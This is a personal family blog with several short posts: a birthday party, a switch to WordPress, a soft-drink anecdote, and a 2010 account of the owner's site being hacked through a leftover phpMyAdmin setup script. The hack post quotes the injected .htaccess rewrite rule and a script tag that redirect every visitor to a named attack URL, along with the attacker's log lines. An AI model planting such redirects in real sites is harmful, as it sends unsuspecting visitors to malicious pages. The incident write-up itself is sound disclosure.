Mental Junk

Sharon and Steve had a party for Joseph’s 8th birthday at AirZone tonight.  They invited the boys and they all had a great time.

Thanks for having us!

I love it when she smiles.  😉

After a website overhaul I’ve decided to change blog programs.  I’ve decided to start using the most popular one out there, so now this site is a WordPress site.

I will be updating the format and the style as I find the time (when that is…. well, Christmas is coming up).

I hope that this change is a good one – I really like the new tools it has.  The last time I checked – the LifeType platform was a better on (IMHO).  Now, however, with the number of active developers on the WordPress project – this one is a lot more active and well rounded.

Today – at 4:26pm (server time) my site was hacked.

 All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)

 After trying to figure out how hey got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin.  They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN.  There.  I feel a bit better.

Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups.  Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).

I really can't believe that the installation script was left after the system admins made the image for my VPS.  Really dumb.  As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed.  I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating. 

The final attacked updated all .htaccess files to include:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php

And they inserted the following in the base of the index.php and index.html files for each folder:

<script>document.location.href='http://webarh.com/z.php';</script>

The log files show a single GET and then POST to the file:

174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 – "-" "-"
 

That's it.  That's the hacker.   The host manager has been notified.

 Michelle and I haven't let Cameron (or Nate) have soft drinks. We don't
think they need that much sugar so young. We've told Cameron he was
allowed to have some on his third birthday. We gave him maybe a quarter
of a can with his dinner. His brother wanted to have pop too, so we
gave him some plain soda water – comes from a can and has bubbles – but
no sugar. He is off camera and doesn't like it